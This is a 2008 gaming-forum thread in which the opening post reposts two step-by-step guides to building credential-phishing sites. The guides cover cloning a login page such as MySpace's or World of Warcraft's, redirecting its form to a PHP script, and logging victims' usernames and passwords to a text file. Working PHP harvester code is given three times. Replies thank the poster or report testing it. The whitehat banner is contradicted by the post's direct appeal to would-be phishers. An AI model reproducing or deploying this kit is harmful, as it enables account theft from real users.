Network: WoW Gold | WoW Accounts | MPS Games | FPSowned
MMOwned - World of Warcraft Exploits, Hacks, Bots and Guides
Homepage »      Register »      Hall of Fame »      Ranks And Awards »      Advertise »      Marketplace »
 
Sign up



Do you like this excellent information? Then Donate HERE to remove ads and support the MMOwned community.


Go Back   MMOwned - World of Warcraft Exploits, Hacks, Bots and Guides > World of Warcraft > WoW Scams

WoW Scams World of Warcraft Whitehat Scamming Methods ONLY.
[NO QUESTIONS HERE]
We do not condone scamming, this section is meant for people to read about scamming so they can prevent being scammed themselves.

Reply
 
LinkBack Thread Tools
  #1  
Old 08-25-2008
Saaen's Avatar
Saaen is offline.
Contributor
  
 
Join Date: Jun 2008
Posts: 522
Reputation: 117
Points: 3,319, Level: 5
Points: 3,319, Level: 5 Points: 3,319, Level: 5 Points: 3,319, Level: 5
Level up: 65%, 281 Points needed
Level up: 65% Level up: 65% Level up: 65%
Activity: 3.3%
Activity: 3.3% Activity: 3.3% Activity: 3.3%

Pirate 2 Guides in one! How to make your Own Phishing site!!

I saw these nice guides on hackforums.net and decided to post them to share! (doubt anyone else would) Anyway.... Ever wanted a phishing site made by you? Whether it's WoW (that's why it's in wow scams" or some other thing (myspace).

Well after I got a couple requests from people in my scam help thread, I went to find them. Anyway.... (again) These aren't mine, I will be giving credit to the person on hackforums who posted them, but I will change a couple words in the guide to fit for wow. There are two guides I'm about to list, ones somewhat easy to follow and ones not, choose the one you like!


Guide one!

1. First things first you must choose the site which you wanna make a phisher from.

2. When you found your site right click on it and say "view source" and save it on desktop as index.htm

3. Open the "index.htm" with notepad and find search the source for the word "action". you should find a command looking like this
<form action="RANDOM URL" method="post" autocomplete="off">
or anything alike.

4. change the url (in this case "RANDOM URL") to "next.php"

5. Save index.htm

6. Time to create a free website. It MUST SUPPORT .php files so i suggest the use of [Only registered and activated users can see links. ]. Create a free website.

7. login to your website and go to "file manager"

8. delete the file thats already there called "index.htm" and upload your "index.htm" (the one you just made)

9. Create a new file called next.php and copy / paste this:

Code:
<?php
header("Location: http://WEBSITE ");
$handle =

fopen("pass.txt", "a");
foreach($_GET as

$variable => $value) {
fwrite($handle,

$variable);
fwrite($handle, "=");

fwrite($handle, $value);
fwrite($handle,

"\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
10. Switch out the word "WEBSITE" with the site the browser should go to after victim wrote his/her password. so it should say like this:
header("Location: [Only registered and activated users can see links. ] ");

11. Save this file (next.php)

12. Create a new file called "pass.txt". dont write anything in it. just save it empty. Your done making your phising site!

13. test out your website. type in something in your phisher and then go to filemanager and open "pass.txt" what you wrote should be typed here!

14. if its not typed there you should try editing "next.php" and enter this instead:

Code:
<?php
header("Location: http://RANDOM");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
think you know what to do with the "RANDOM" url.

NOTE: IF YOU USE THE SECOND CODE, YOU MUST SAVE THE TXT. FILE "password.txt" instead of "pass.txt"

Credits to Mathias of Hackforums.net

Well, onto guide two!

Guide Two (This one is not step by step)

All you need is a web hosting service with PHP enabled.
We will use t35. Go to [Only registered and activated users can see links. ] and sign up for a free account. In this tutorial we will make a phishing site for Myspace(the procedure is equivalent for most of the sites). While not signed in myspace, open anyone's profile and click on his picture. That will lead you to Myspace's login page that has the red box with"You Must Be Logged-In to do That!" just above your login form. Now, click File>Save Page As, and save the myspace page to your Desktop. Open your saved page with any text editor(notepad, wordpad etc.). Select all of the text(the source code), and copy it.
Get back to your t35 account and click on 'New File' and paste the Myspace's source code there. Name the file 'login.php'(without the ''), and save it.
Now you have made a page equal to Myspace. Everything on that page will have the same function as if it were on the original site. The link to your phish site will be 'www.xxx.t35.com/login.php' - where 'xxx' is the name of your account.
But there is a little problem. When someone enters his username and password and press login, it logs him into the real myspace.
What do we need to change?
What we need to change is the action of the 'login' button, so instead of logging them into the real site, it writes the username and password to a text file.
Open your 'login.php' file. Search in the code for keywords 'action='.
There will be several 'action=some link' in the myspace's source code(for the sign in button, search button, etc.). We need to find the 'action=some link' that refers to the Login button.
After some searching, we find the:

Code:
<h5 class="heading">
            Member Login
        </h5>
        <form action="http://secure.myspace.com/index.cfm?fuseaction=login.process" method="post" id="LoginForm" name="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNTMzMjE3MzI5ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUwY3RsMDAkT WFpbiRTcGxhc2hEaXNwbGF5JGN0bDAwJFJlbWVtYmVyX0NoZWNrYm94BTBjdGwwMCRNYWluJFNwbGFza ERpc3BsYXkkY3RsMDAkTG9naW5fSW1hZ2VCdXR0b24=" />
</div>
(The myspace part is there b/c this perosn used a myspace source code, a WoW one will be different)

and we know that 'action="http://secure.myspace.com/index.cfm?fuseaction=login.process"' refers to the login button.
Change:
action="http://secure.myspace.com/index.cfm?fuseaction=login.process"
To:
action="phish.php"
and save the file.

Formerly, when you click the login button it would take the values in the username and password boxes, and execute the functions in the 'http://secure.myspace.com/index.cfm?fuseaction=login.process' file.
Now when you click the login button it will take the values in the username in password boxes, and execute the functions in the 'phish.php' file on your site(which doesn't exist yet).
All we have to do now, is to create a 'phish.php' file that contains a function that writes down the username and password into a text document.
Make another file named 'phish.php'(without the quotes) and paste the following code in it:

Code:
?php
header ('Location: http:/websiteyouwanttomakeaphisherfor.com ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
The function of phish.php is simple. It opens a file named 'passwords.txt'(and creates it if it doesn't already exist) and enter the information there(the username and password).
Congratulations! You have a phisher!Superman
The link to your phish site is:
[Only registered and activated users can see links. ] -where 'xxx' is your account name.
The link to your text file is:
[Only registered and activated users can see links. ]
Or you may access it from your account.

Note that you can choose whatever names you like for login.php, phish.php and passwords.txt. but the .php and .txt must stay the same.

Credits (mostly) Crow of hackforunms.net

Well, that's all that's needed since everybody knows how they are spread! Good luck with your own phisher (whatever it is about)
__________________
Reply With Quote


Donate to remove ads, get your "DONATOR title, and get access to the MMOwned community's elite Shoutbawx.

  #2  
Old 08-25-2008
ShadeRat is offline.
Master Sergeant
  
 
Join Date: Mar 2007
Posts: 108
Reputation: 5
pass.txt is growing bigger when i type in info, but i cant view what i typed. Going to see if password.txt is any better
Reply With Quote
  #3  
Old 08-25-2008
creesy is offline.
Site n00b.. (A leecher if I've been here for more than a month and can't earn 5 rep)
  
 
Join Date: Aug 2008
Posts: 91
Reputation: 3
thanks mate good guide if i could rep i would
Reply With Quote
  #4  
Old 08-25-2008
Saaen's Avatar
Saaen is offline.
Contributor
  
 
Join Date: Jun 2008
Posts: 522
Reputation: 117
Points: 3,319, Level: 5
Points: 3,319, Level: 5 Points: 3,319, Level: 5 Points: 3,319, Level: 5
Level up: 65%, 281 Points needed
Level up: 65% Level up: 65% Level up: 65%
Activity: 3.3%
Activity: 3.3% Activity: 3.3% Activity: 3.3%

You can rep me, unless you need to spread :P. (not asking, just saying that he has the option too)
__________________
Reply With Quote
  #5  
Old 08-25-2008
JohnPreston's Avatar
JohnPreston is offline.
Knight-Champion
  
 
Join Date: Feb 2007
Posts: 573
Reputation: 216
Saaen, now I'm in your topic for a change lol.

X2 EDIT (after I spread it...)
Reply With Quote
  #6  
Old 08-25-2008
[Royal] is offline.
Banned
  
 
Join Date: Mar 2008
Location: China Man's Hideout.
Posts: 697
Reputation: 336
Points: 2,839, Level: 5
Points: 2,839, Level: 5 Points: 2,839, Level: 5 Points: 2,839, Level: 5
Level up: 5%, 761 Points needed
Level up: 5% Level up: 5% Level up: 5%
Activity: 0%
Activity: 0% Activity: 0% Activity: 0%
Its a good guide and thanks for sharing, I'm not going to rep because you didn't make it, but thanks A TON for posting this here for others.
Reply With Quote
  #7  
Old 08-26-2008
XatoA's Avatar
XatoA is offline.
Master Sergeant
  
 
Join Date: Nov 2007
Posts: 86
Reputation: 15
Points: 547, Level: 1
Points: 547, Level: 1 Points: 547, Level: 1 Points: 547, Level: 1
Level up: 30%, 353 Points needed
Level up: 30% Level up: 30% Level up: 30%
Activity: 0%
Activity: 0% Activity: 0% Activity: 0%

Wow great guide, if i wasnt a leecher id +rep u
Reply With Quote
  #8  
Old 08-26-2008
Tanax's Avatar
Tanax is offline.
Knight-Lieutenant
  
 
Join Date: Jan 2007
Location: Sweden
Posts: 234
Reputation: 53
Points: 1,139, Level: 2
Points: 1,139, Level: 2 Points: 1,139, Level: 2 Points: 1,139, Level: 2
Level up: 48%, 261 Points needed
Level up: 48% Level up: 48% Level up: 48%
Activity: 0%
Activity: 0% Activity: 0% Activity: 0%
Hmm.. not to sound negative or anything.. but the phishers created with these scripts are, sorry to say, not even worth having. The phishers script will be so bad, so that noone will fall for it. And if someone would actually fall for it, they will be so noobie that the account isn't worth having.

Why? Cause the script doesn't really run ANY checks on for example required fields. If a field is a number, then it doesn't check that. It doesn't have any errorchecking whatsoever.

I'd say; Learn some PHP instead of trying this out. Sure, this could be a good start, but I would suggest you to actually learn the PHP language, before trying to create phisher scripts.
Just my 2 cents.
__________________

WorkFor3Dollars.com/?r=Tanax13
Reply With Quote
Reply

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are On



All times are GMT -4. The time now is 09:13 AM.




Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.
Search Engine Optimization by vBSEO 3.3.1

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493